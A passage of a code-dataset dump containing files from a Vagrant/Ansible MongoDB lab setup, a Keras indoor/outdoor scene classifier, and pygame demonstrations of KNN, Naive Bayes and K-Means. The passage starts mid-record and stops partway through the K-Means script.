"/tools/client_example/count_all_data.py", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\nfrom pprint import pprint\nfrom datetime import datetime\nimport ConfigParser\nimport os\n\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\n\ninifile = ConfigParser.SafeConfigParser()\ninifile.read( SCRIPT_DIR + '/client.ini')\nmongo_url = inifile.get('con', 'mongo_url')\nclient = MongoClient(mongo_url)\n\ndb = client.repltestdb\ncount = db.testcol01.find({}).count()\nprint count\n" }, { "alpha_fraction": 0.7690288424491882, "alphanum_fraction": 0.7769029140472412, "avg_line_length": 28.30769157409668, "blob_id": "5d7e28a429b2315ff4d20544af1aae271a7f6ea2", "content_id": "e6dbf10bb0ee839ddb0ccab5b192d85d1a03d8c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 381, "license_type": "no_license", "max_line_length": 177, "num_lines": 13, "path": "/install_tools/install_pip.sh", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "#!/bin/bash\necho \"@@@ Install python-pip\"\nyum groupinstall -y \"Base\"\nyum groupinstall -y \"Development tools\"\nyum install -y zlib zlib-devel openssl tk-devel tcl-devel sqlite-devel ncurses-devel gdbm-devel readline-devel bzip2-devel db4-devel openssl-devel python-setuptools python-devel\nyum install -y libffi-devel\n\neasy_install pip\npip install --upgrade pip\n\necho \"Done!\"\n\nexit 0\n" }, { "alpha_fraction": 0.7115384340286255, "alphanum_fraction": 0.7307692170143127, "avg_line_length": 16.33333396911621, "blob_id": "ae32e2eed887339caec872d2de867373dfe12821", "content_id": "146a45924c6b2edad33b3c1a3def34b8986ea0fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Shell", "length_bytes": 156, "license_type": "no_license", "max_line_length": 47, "num_lines": 9, "path": "/install_tools/install_ansible.sh", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "#!/bin/bash\necho \"@@@ Install ansible\"\npip install PyYAML paramiko Jinja2 httplib2 six\npip install ansible\nyum install -y sshpass\n\necho \"@@@ Done!\"\n\nexit 0\n" }, { "alpha_fraction": 0.37272727489471436, "alphanum_fraction": 0.3909091055393219, "avg_line_length": 16.3157901763916, "blob_id": "dc56f59460febe673d2c1b170e84735daa0a766f", "content_id": "425d93933207c87032f980ddae2b0cee5a7ed0be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 330, "license_type": "no_license", "max_line_length": 59, "num_lines": 19, "path": "/tools/client_example/looping.sh", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "#!/bin/bash\nSCRIPT=$1\n\nif [ $# -ne 1 ]; then\n echo \"Usage: $0 <SCRIPT>\"\n exit 0\nfi\n\nwhile :\ndo\n echo \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\n echo \"@ Execute python ${SCRIPT}\"\n echo \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\n python ${SCRIPT}\n echo \"\"\n echo \"Sleeping 3s\"\n sleep 3s\n echo \"\"\ndone\n\n" }, { "alpha_fraction": 0.7447306513786316, "alphanum_fraction": 0.7494145035743713, "avg_line_length": 21.473684310913086, "blob_id": "6103c48cd49afd300a9361914ab3d4171c2c870f", "content_id": "92aca8522df6916170cfe726b403612feee503f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 427, "license_type": "no_license", "max_line_length": 55, "num_lines": 19, "path": "/tools/client_example/find_all_data.py", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\nfrom pprint import pprint\nfrom datetime import datetime\nimport ConfigParser\nimport os\n\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\ninifile = ConfigParser.SafeConfigParser()\ninifile.read( SCRIPT_DIR + '/client.ini')\nmongo_url = inifile.get('con', 'mongo_url')\nclient = MongoClient(mongo_url)\n\ndb = client.repltestdb\ncursor = db.testcol01.find({})\nfor doc in cursor:\n print(doc)\n" }, { "alpha_fraction": 0.555444061756134, "alphanum_fraction": 0.6081284284591675, "avg_line_length": 25.223684310913086, "blob_id": "2fa675a7f9fea94b8b9371216ec10a7a557720eb", "content_id": "00e02f76ffc36aa70a50869a3f8e9d3a10fd5ddb", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "Ruby", "length_bytes": 1993, "license_type": "no_license", "max_line_length": 87, "num_lines": 76, "path": "/Vagrantfile", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\nVagrant.configure(\"2\") do |config|\n synced_host_dir = \"./\"\n synced_guest_dir = \"/vagrant\"\n\n config.vm.define \"master\" do |m|\n m.vm.box = \"bento/centos-7.3\"\n m.vm.box_check_update = false\n\n m.vm.hostname = \"master\"\n m.vm.network \"private_network\", ip: \"192.168.33.131\", virtualbox__intnet: \"intnet\"\n m.vm.synced_folder synced_host_dir, synced_guest_dir\n\n m.vm.provider \"virtualbox\" do |m_vb|\n m_vb.cpus = 1\n m_vb.memory = \"724\"\n end\n\n m.vm.provision \"shell\" do |sh|\n sh.env = {\n \"http_proxy\" => ENV['http_proxy'],\n \"https_proxy\" => ENV['https_proxy']\n }\n sh.inline = <<-SHELL\n bash /vagrant/install_tools/install_pip.sh\n bash 
/vagrant/install_tools/install_ansible.sh\n SHELL\n end\n end\n\n config.vm.define \"mongo1\" do |s1|\n s1.vm.box = \"bento/centos-7.3\"\n s1.vm.box_check_update = false\n\n s1.vm.network \"private_network\", ip: \"192.168.33.132\", virtualbox__intnet: \"intnet\"\n s1.vm.hostname = \"mongo1\"\n s1.vm.synced_folder synced_host_dir, synced_guest_dir\n\n s1.vm.provider \"virtualbox\" do |s1_vb|\n s1_vb.cpus = 1\n s1_vb.memory = \"724\"\n end\n end\n\n config.vm.define \"mongo2\" do |s2|\n s2.vm.box = \"bento/centos-7.3\"\n s2.vm.box_check_update = false\n\n s2.vm.network \"private_network\", ip: \"192.168.33.133\", virtualbox__intnet: \"intnet\"\n s2.vm.hostname = \"mongo2\"\n\n s2.vm.synced_folder synced_host_dir, synced_guest_dir\n\n s2.vm.provider \"virtualbox\" do |s2_vb|\n s2_vb.cpus = 1\n s2_vb.memory = \"724\"\n end\n end\n\n config.vm.define \"mongo3\" do |s3|\n s3.vm.box = \"bento/centos-7.3\"\n s3.vm.box_check_update = false\n\n s3.vm.network \"private_network\", ip: \"192.168.33.134\", virtualbox__intnet: \"intnet\"\n s3.vm.hostname = \"mongo3\"\n\n s3.vm.synced_folder synced_host_dir, synced_guest_dir\n\n s3.vm.provider \"virtualbox\" do |s3_vb|\n s3_vb.cpus = 1\n s3_vb.memory = \"724\"\n end\n end\nend\n" }, { "alpha_fraction": 0.5965664982795715, "alphanum_fraction": 0.6030042767524719, "avg_line_length": 14.533333778381348, "blob_id": "b97cf51b3b3d468c2d24b041ebfdbc099e9ca09b", "content_id": "5c9926b0248554496641c7687411f840e0940f74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 506, "license_type": "no_license", "max_line_length": 49, "num_lines": 30, "path": "/README.md", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "# Playbook_mongodb\n\n## Description\nmongodb構築(シャーディング構成なし)のplaybookです\n\n## Overview\n\n![overview](docs/images/overview.png)\n\n## Package\n| Package | Version | Description |\n| --------------- | -------- | ----------- |\n| MongoDB | 3.6.0 | 全Mongo VMにinstall |\n\n\n## Installation\n\n```\n# export http_proxy=<your proxy settings>\n# export https_proxy=<your proxy settings>\n\n# vagrant up\n# vagrant ssh master\n\n$ sudo su -\n# cd /vagrant\n# bash play.sh\n```\n\n以上\n" }, { "alpha_fraction": 0.7179039120674133, "alphanum_fraction": 0.7213973999023438, "avg_line_length": 31.714284896850586, "blob_id": "2cb91754ad0bc43ab983eddb33c147f54ea2f2bc", "content_id": "8ce25e0b61b1307a74510b98fe081f195ba22fed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1145, "license_type": "no_license", "max_line_length": 96, "num_lines": 35, "path": "/tools/client_example/insert_bulk_data_writeconcern.py", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient, WriteConcern, InsertOne\nfrom pymongo.errors import BulkWriteError\nfrom pprint import pprint\nfrom datetime import datetime\nimport ConfigParser\nimport os\n\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\n\ninifile = ConfigParser.SafeConfigParser()\ninifile.read( SCRIPT_DIR + '/client.ini')\nmongo_url = inifile.get('con', 'mongo_url')\nmax_data_num = int(inifile.get('insert', 'bulk_max_count'))\nwtime_out_millsec = int(inifile.get('insert', 'w_concern_repl_timeout_milisec'))\nwrite_concern_opt = inifile.get('insert', 'w_concern_opt')\n\nclient = MongoClient(mongo_url)\ntimestamp = datetime.now().strftime(\"%Y/%m/%d %H:%M:%S%f\")\ndb = client.repltestdb\n\nprint \"@@@ Inserting bulk data %s with 
write_concern ...\" % (max_data_num)\ncoll = db.get_collection(\n\t'testcol01', write_concern=WriteConcern(w=write_concern_opt, wtimeout=wtime_out_millsec))\ntry:\n coll.bulk_write([InsertOne({\"timestamp\": timestamp, 'id': i}) for i in range(max_data_num)])\n print \"OK.\"\n\nexcept BulkWriteError as bwe:\n pprint(bwe.details)\n\ndata_count = db.testcol01.find({}).count()\nprint \"count = %s\" % data_count\n\nprint \"Done!\"\n" }, { "alpha_fraction": 0.7061611413955688, "alphanum_fraction": 0.7124802470207214, "avg_line_length": 26.521739959716797, "blob_id": "375ef1077ba6703292f185791097cbf92d0e6536", "content_id": "b2b23912fd2dfa78e668915ec652edff36c515f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 633, "license_type": "no_license", "max_line_length": 59, "num_lines": 23, "path": "/tools/client_example/insert_single_data.py", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\nfrom pprint import pprint\nfrom datetime import datetime\nimport ConfigParser\nimport os\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\n\ninifile = ConfigParser.SafeConfigParser()\ninifile.read( SCRIPT_DIR + '/client.ini')\nmongo_url = inifile.get('con', 'mongo_url')\nclient = MongoClient(mongo_url)\n\ntimestamp = datetime.now().strftime(\"%Y/%m/%d %H:%M:%S.%f\")\ndb = client.repltestdb\ntest_doc = { \"key\": \"timestamp\", \"value\": timestamp }\n\nprint \"@@@ Insert single data...\"\ndb.testcol01.insert_one(test_doc)\ndata_count = db.testcol01.find({}).count()\nprint \"count = %s\" % data_count\n\nprint \"Done!\"\n" }, { "alpha_fraction": 0.6969273686408997, "alphanum_fraction": 0.7025139927864075, "avg_line_length": 30.130434036254883, "blob_id": "ec6b2c7aede65c5ab0bea7013cd776d625545335", "content_id": "1f293d2cd59b06e979cbf70daf3708c06f2620d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 716, "license_type": "no_license", "max_line_length": 104, "num_lines": 23, "path": "/tools/client_example/insert_bulk_data.py", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\nfrom datetime import datetime\nimport ConfigParser\nimport os\n\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\n\ninifile = ConfigParser.SafeConfigParser()\ninifile.read( SCRIPT_DIR + '/client.ini')\nmongo_url = inifile.get('con', 'mongo_url')\nmax_data_num = int(inifile.get('insert', 'bulk_max_count'))\n\nclient = MongoClient(mongo_url)\ntimestamp = datetime.now().strftime(\"%Y/%m/%d %H:%M:%S%f\")\ndb = client.repltestdb\nprint \"@@@ Inserting bulk %s data...\" % (max_data_num)\ndb.testcol01.insert_many([{\"timestamp\": timestamp, \"id\": i } for i in range(max_data_num)]).inserted_ids\nprint \"OK.\"\ndata_count = db.testcol01.find({}).count()\nprint \"count = %s\" % data_count\n\nprint \"Done!\"\n" }, { "alpha_fraction": 0.6198019981384277, "alphanum_fraction": 0.7207920551300049, "avg_line_length": 25.578947067260742, "blob_id": "2ae325ed1a620ec4bb1541562c78d7362c5c3181", "content_id": "30674d938767b7ede7965075994a1516f6409efa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 505, "license_type": "no_license", "max_line_length": 78, "num_lines": 19, "path": "/play.sh", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "#!/bin/bash\nCWD=\"$(cd $(dirname $0) && pwd)\"\nEXTRA_OPTS=\"\"\n\ncat << 
EOF >/etc/hosts\n127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4\n::1 localhost localhost.localdomain localhost6 localhost6.localdomain6\n\n192.168.33.132 mongo1\n192.168.33.133 mongo2\n192.168.33.134 mongo3\nEOF\n\necho 'StrictHostKeyChecking no' >/root/.ssh/config\n\nansible-playbook ${EXTRA_OPTS} -i ${CWD}/hosts ${CWD}/site.yml \\\n--extra-vars \"http_proxy=${http_proxy} https_proxy=${https_proxy}\"\n\nexit 0\n" } ]
num_files: 13
repo_name: projectSKH/Indoor-Outdoor-Scene-Classification
repo_url: https://github.com/projectSKH/Indoor-Outdoor-Scene-Classification
snapshot_id: 83684ce5aa8635592e5c93a5dab5a91b206a0e23
revision_id: e71fd7cd0e8432500934a0236dbbe4567d5b8b3b
directory_id: 572a7f449922aaf34d00ff0bc6c6dfb390300b33
branch_name: refs/heads/master
visit_date: 2023-08-08T17:01:50.452581
revision_date: 2019-02-21T19:42:35
committer_date: 2019-02-21T19:42:35
github_id: 674,993,137
star_events_count: 1
fork_events_count: 0
gha_license_id: null
gha_created_at: 2023-08-05T12:19:40
gha_updated_at: 2023-08-05T12:19:40
gha_pushed_at: 2019-02-21T19:42:36
gha_language: null
files:
[ { "alpha_fraction": 0.7885321378707886, "alphanum_fraction": 0.7935779690742493, "avg_line_length": 53.400001525878906, "blob_id": "cba80534a91ff7d877e6dac914e357f7d07598d7", "content_id": "93931da7f028cf5e911b0aa4379fdacaae30cca1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2180, "license_type": "no_license", "max_line_length": 222, "num_lines": 40, "path": "/README.md", "repo_name": "projectSKH/Indoor-Outdoor-Scene-Classification", "src_encoding": "UTF-8", "text": "# Indoor-Outdoor-Scene-Classification\nOne of the application of image classification is to classify scenes and recognize them according to category.\nIt's use can be ranged from autonomous vehicle navigation to video games.\n\n## Dependencies\n- ffmpeg\n- Python\n- Keras(Tensorflow Backend)\n\n## Data Handling\nTo start with the challenge first thing to do is prepare a neat data library with the given classes as outdoor and indoor. \nData was taken from Youtube-8m dataset, at first videos were parsed categorically (Ref-https://github.com/gsssrao/youtube-8m-videos-frames)\nthen frames were extracted using ffmpeg. Finally the data was split into train, test and validation sets.\n\n### Usage\n- Save the videos categorically in folders indoor and outdoor respectively. Go to each folder and run the Frames bash file with first argument as path and second as number of frames per second.\n- Use Split_data.py file with path to input and output folders.\n\n## Training\nAfter the data is prepared, I used CNN to classify images and train the model. \nUsing Image data generator to augment the data and convert image size to 64*64. It neatly takes in the data according to classes. Following model is used to train and validate the images:\n\n![Alt text](https://github.com/prajacta-nagraj/Indoor-Outdoor-Scene-Classification/blob/master/modelcnn.png?raw=true \"Model\")\n\n\nAfter trial/error and using early stopping method overfitting was reduced and the model showed accuracy of 80% for test data.\n\n![Alt text](https://github.com/prajacta-nagraj/Indoor-Outdoor-Scene-Classification/blob/master/Graphs.png?raw=true \"Accuracy\")\n\n\n## Image Classification \nTo finally test the image run Scene-Classification.py file and provide the test image name when prompted.( test image should be in the current directory with othe saved model).\n$ python Scene-Classification.py\n\n## Future Work\nAs seen from the above model few changes can be made to increase accuracy of the model including increasing the training data,image augmentation, L1/L2 regularization. 
We can also include more layers of Dropout in the end.\n\n## References\n-Youtube-8m dataset \n-Keras/tensorflow blogs and tutorials on modeling a CNN.\n\n\n\n\n" }, { "alpha_fraction": 0.6424116492271423, "alphanum_fraction": 0.6694386601448059, "avg_line_length": 16.66666603088379, "blob_id": "6f848597e6b09e079186ccefde524508cdc857d0", "content_id": "e2020dca3200952a819a4c4ab20764d2ab4705ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 481, "license_type": "no_license", "max_line_length": 54, "num_lines": 27, "path": "/Scene-Classification.py", "repo_name": "projectSKH/Indoor-Outdoor-Scene-Classification", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom keras.models import load_model\nmodel = load_model('mymodel.h5')\n\n\n# In[16]:\n\n\ntxt = raw_input(\"Type image name: \")\nimport numpy as np\nfrom keras.preprocessing import image\nimg = image.load_img(txt, target_size=(64, 64))\nx = np.expand_dims(image.img_to_array(img), axis=0)\nimages = np.vstack([x])\nclasses = model.predict_classes(images, batch_size=10)\nif classes==1:\n print 'outdoor'\nelse:\n print 'indoor'\n\n\n# In[ ]:\n\n\n\n\n" }, { "alpha_fraction": 0.7133105993270874, "alphanum_fraction": 0.7576791644096375, "avg_line_length": 57.599998474121094, "blob_id": "4fedf960a700e061d74513fe60c34330b9ed915f", "content_id": "566c4e9db1a5b076e4c02cd57bc51452cb443c10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 293, "license_type": "no_license", "max_line_length": 161, "num_lines": 5, "path": "/Split_data.py", "repo_name": "projectSKH/Indoor-Outdoor-Scene-Classification", "src_encoding": "UTF-8", "text": "#use python 3.6+\n#pip install split_folders\n#python module to split image folder to train,test and split data\nimport split_folders\nsplit_folders.ratio('/home/prajacta/yt8m/youtube-8m-videos-frames/input/', output='/home/prajacta/yt8m/youtube-8m-videos-frames/', seed=1337, ratio=(.8, .1, .1))\n" }, { "alpha_fraction": 0.5583333373069763, "alphanum_fraction": 0.6166666746139526, "avg_line_length": 38, "blob_id": "02432a998659556df6349b1bdb6034dcb01ebdee", "content_id": "e1b7a34da5325ea20ab2ab58284074fc25281456", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 120, "license_type": "no_license", "max_line_length": 97, "num_lines": 3, "path": "/Frames.sh", "repo_name": "projectSKH/Indoor-Outdoor-Scene-Classification", "src_encoding": "UTF-8", "text": "\n\nfor file in *.mp4; do ffmpeg -i \"$file\" $1\"${file%.mp4}\"%04d.png -vf -fps=1/$2 -hide_banner; done\n\n# generate frames\n\n" } ]
num_files: 4
repo_name: sheepsy90/InteractiveMachineLearning
repo_url: https://github.com/sheepsy90/InteractiveMachineLearning
snapshot_id: 82d373bd90ea0d192fe99f0fc9409e098c528458
revision_id: d612e2257122180808c422d06be77c8408f2048a
directory_id: dad14fcfd4500e79153c625ac4450aabcd875f74
branch_name: refs/heads/master
visit_date: 2016-09-06T03:27:36.620202
revision_date: 2015-03-25T19:39:12
committer_date: 2015-03-25T19:39:12
github_id: 32,726,516
star_events_count: 12
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.5562579035758972, "alphanum_fraction": 0.5714285969734192, "avg_line_length": 33.34782791137695, "blob_id": "bd6dc37446fd80297c866f4639613ecec2d56f2b", "content_id": "1c51b16cdc01d9fbbd5fc93162e45fc798098535", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1582, "license_type": "no_license", "max_line_length": 110, "num_lines": 46, "path": "/algorithms/KNearestNeighbour.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "from collections import Counter\nimport math\n\nclass KNN():\n\n def __init__(self, num_classes):\n self.num_clases = num_classes\n self.data_points = []\n\n def add_data_point(self, label, pnt):\n assert 1 <= int(label) <= self.num_clases\n self.data_points.append((pnt, label))\n\n def clear(self):\n self.data_points = []\n\n def calculate_euclidean_distance(self, e1, e2):\n assert len(e1) == len(e2)\n return math.sqrt(sum([(e1[i] - e2[i])**2 for i in range(len(e1))]))\n\n def estimate(self, k, pnt):\n try:\n distances = [(self.calculate_euclidean_distance(pnt, p[0]), p[1]) for p in self.data_points]\n distances = sorted(distances, key=lambda e: e[0])\n distances = distances[:k]\n distances = [e[1] for e in distances]\n counted = Counter(distances)\n predicted_label = counted.most_common(1)[0][0]\n return predicted_label\n except:\n return None\n\n def estimate_and_get_nearest(self, k, pnt):\n try:\n distances = [(self.calculate_euclidean_distance(pnt, p[0]), p[1], p[0]) for p in self.data_points]\n distances = sorted(distances, key=lambda e: e[0])\n distances = distances[:k]\n distance_labels = [e[1] for e in distances]\n counted = Counter(distance_labels)\n predicted_label = counted.most_common(1)[0][0]\n return predicted_label, distances\n except:\n return None\n\n def get_data_points(self):\n return self.data_points\n\n\n" }, { "alpha_fraction": 0.5306700468063354, "alphanum_fraction": 0.5552060604095459, "avg_line_length": 27.648649215698242, "blob_id": "860560af57037b20b86d02a2410f0240faad9d2c", "content_id": "09d55b0986c652d98c6a804ad85e97f135fea07f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3179, "license_type": "no_license", "max_line_length": 96, "num_lines": 111, "path": "/InteractiveNaiveBayes.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import pygame\nimport math\nfrom algorithms.NaiveBayes import NaiveBayes\n\n#defining color variables\nBLACK = (0, 0, 0)\nWHITE = (190, 190, 190)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0,255)\nYELLOW = (255, 255, 0)\n\ncolour_by_class = {\n 0: RED,\n 1: GREEN,\n 2: BLUE,\n 3: YELLOW\n}\n\n#window settings\nsize = (800, 800)\npygame.init()\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Naive Bayes\")\nfont = pygame.font.Font(None, 36)\n\n#setting fps variable\nclock = pygame.time.Clock()\n\n# State Variables\ndone = False\n\n\nnaive_bayes_storage = NaiveBayes()\ndraw_area = False\ndraw_cursor = False\nprobabilistic_switch = False\n\nwhile not done:\n pos = pygame.mouse.get_pos()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n done = True\n if event.key == pygame.K_c:\n naive_bayes_storage.clear()\n if event.key == pygame.K_1:\n naive_bayes_storage.add_data_point(0, pos)\n naive_bayes_storage.build_model()\n break\n if event.key == pygame.K_2:\n naive_bayes_storage.add_data_point(1, pos)\n 
naive_bayes_storage.build_model()\n break\n if event.key == pygame.K_3:\n naive_bayes_storage.add_data_point(2, pos)\n naive_bayes_storage.build_model()\n break\n if event.key == pygame.K_4:\n naive_bayes_storage.add_data_point(3, pos)\n naive_bayes_storage.build_model()\n break\n\n if event.key == pygame.K_m:\n break\n\n if event.key == pygame.K_a:\n if naive_bayes_storage.has_model():\n draw_area = not draw_area\n break\n if event.key == pygame.K_l:\n if naive_bayes_storage.has_model():\n draw_cursor = not draw_cursor\n break\n if event.key == pygame.K_p:\n if naive_bayes_storage.has_model():\n probabilistic_switch = not probabilistic_switch\n break\n\n screen.fill(BLACK)\n\n if draw_area:\n for i in range(0, size[0], 20):\n for j in range(0, size[0], 20):\n x,y = i+10, j+10\n result = naive_bayes_storage.predict((i, j), probabilistic=probabilistic_switch)\n\n if result is not None and not math.isnan(result):\n pygame.draw.circle(screen, colour_by_class[result], (i, j), 1)\n\n\n data_points = naive_bayes_storage.get_data_points()\n # First draw all points on screen\n for pnt in data_points:\n pygame.draw.circle(screen, colour_by_class[pnt[0]], pnt[1], 5)\n\n text = font.render(str(\"FPS: \" + str(int(clock.get_fps()))), True, WHITE)\n screen.blit(text, (700,10))\n\n if draw_cursor:\n # Estimate the mouse cursors colour\n result = naive_bayes_storage.predict(pos)\n\n if result is not None:\n pygame.draw.circle(screen, colour_by_class[result], pos, 8)\n\n pygame.display.flip()\n clock.tick(60)\n\npygame.quit()" }, { "alpha_fraction": 0.5560278296470642, "alphanum_fraction": 0.5656877756118774, "avg_line_length": 33.9594612121582, "blob_id": "9c6cd6cdd02a58ed79652f31806a72d143bfc2b2", "content_id": "6a01e39b03470cc234c04fb08884ac842a8b2f33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2588, "license_type": "no_license", "max_line_length": 97, "num_lines": 74, "path": "/algorithms/NaiveBayes.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import random\nimport unittest\nimport numpy as np\nimport math\n\n\nclass NaiveBayes(object):\n\n def __init__(self):\n self.data_by_class = {}\n self.statistical_model = None\n\n def add_data_point(self, label, features):\n if label not in self.data_by_class:\n self.data_by_class[label] = []\n self.data_by_class[label].append(features)\n\n def get_data_points(self):\n return [(k, j) for k, v in self.data_by_class.items() for j in v]\n\n def clear(self):\n self.data_by_class = {}\n self.statistical_model = None\n\n def build_model(self):\n # First Step is to calculate mean by features and class\n statistical_attributes = {}\n\n for key, value in self.data_by_class.items():\n np_matrix = np.array(value)\n means, stds = np_matrix.mean(axis=0, dtype=np.float32), np_matrix.std(axis=0, ddof=1)\n statistical_attributes[int(key)] = [(means[i], stds[i]) for i in range(len(means))]\n\n self.statistical_model = statistical_attributes\n\n def calculate_class_probabilities(self, input_vector):\n assert self.statistical_model is not None\n\n probabilities = {}\n for classValue, classSummaries in self.statistical_model.iteritems():\n probabilities[classValue] = 1\n for i in range(len(classSummaries)):\n mean, stdev = classSummaries[i]\n x = input_vector[i]\n try:\n probabilities[classValue] *= self.calculateProbability(x, mean, stdev)\n except:\n probabilities[classValue] *= 0\n return probabilities\n\n def has_model(self):\n return self.statistical_model is not 
None\n\n def predict(self, input_vector, probabilistic):\n probs = self.calculate_class_probabilities(input_vector)\n lst = [(k, v) for k, v in probs.items()]\n lst = sorted(lst, key=lambda arg: -arg[1])\n\n if probabilistic:\n divisior = math.sqrt(sum([e[1]**2 for e in lst]))\n if divisior != 0:\n lst = [[e[0], e[1]/divisior] for e in lst]\n rnd_nr = random.random()\n cum = 0\n for element in lst:\n cum += element[1]\n if cum > rnd_nr:\n return element[0]\n return lst[-1][0]\n return lst[0][0]\n\n def calculateProbability(self, x, mean, stdev):\n exponent = math.exp(-(math.pow(x-mean,2)/(2*math.pow(stdev,2))))\n return (1 / (math.sqrt(2*math.pi) * stdev)) * exponent\n\n" }, { "alpha_fraction": 0.7775148153305054, "alphanum_fraction": 0.7822484970092773, "avg_line_length": 27.133333206176758, "blob_id": "b2d0853a0bbb48cebaa4f5fd7f84250e07c13935", "content_id": "4639df7c9521e78a22da59a7b384e708c18f3360", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 845, "license_type": "no_license", "max_line_length": 119, "num_lines": 30, "path": "/README.md", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "# InteractiveMachineLearning\n\nThree small applications showing KNN, KMeans and NaiveBayes Classifier\n\nThis Script can be started having pygame.\n\nWhen the tool is started the following keys can be used:\n\n= KNN =\n\nNumbers 1-4: Place a labeled point on the current mouse position\n\nKey a - Area Draw - Display a Grid with coloured points regarding their assigned label\nKey l - DrawLines - Display the Label Assignment for the Current Mouse Position as well as the lines to the k-Neigbours\n\nKey +/- Increase/Decrease k\n\n= KMeans =\n\nNumbers 1: Place a data point on the current mouse position\nNumbers 2: Place a cluster startpoint point on the current mouse position\nKey s: Run the Algorithm\nKey c: Clear\n\n\n= Naive Bayes =\n\nAS KNN\n\nAdditionally use the Key p to flicker the borders based on a random number generated absed on the class probabilities \n" }, { "alpha_fraction": 0.5353003144264221, "alphanum_fraction": 0.562346339225769, "avg_line_length": 24.20353889465332, "blob_id": "d583b68026c431ee8bb9e0b567a35fc45703071d", "content_id": "d00ced7cd952fda1dbacccbee98a007e8294935a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2847, "license_type": "no_license", "max_line_length": 93, "num_lines": 113, "path": "/interactiveKMeans.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import time\nimport pygame\n\n#defining color variables\nfrom algorithms.KMeans import KMeans\n\nBLACK = (0, 0, 0)\nWHITE = (190, 190, 190)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nGREY = (150, 150, 150)\nBLUE = (0, 135, 255)\nYELLOW = (255, 255, 0)\n\ncolour_by_class = {\n 0: RED,\n 1: GREEN,\n 2: BLUE,\n 3: YELLOW\n}\n\n#window settings\nsize = (800, 800)\npygame.init()\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"K-Means\")\nfont = pygame.font.Font(None, 36)\n\n#setting fps variable\nclock = pygame.time.Clock()\n\n# State Variables\ndone = False\nk_mean_started = False\nstable = False\nkmeans_state = 0\n\n\ndef mean(lst):\n xs = [e[0] for e in lst]\n ys = [e[1] for e in lst]\n\n meanxs = sum(xs) / float(len(xs))\n meanys = sum(ys) / float(len(ys))\n\n return int(meanxs), int(meanys)\n\n\nkmean_storage = KMeans()\n\nwhile not done:\n pos = pygame.mouse.get_pos()\n\n for event in 
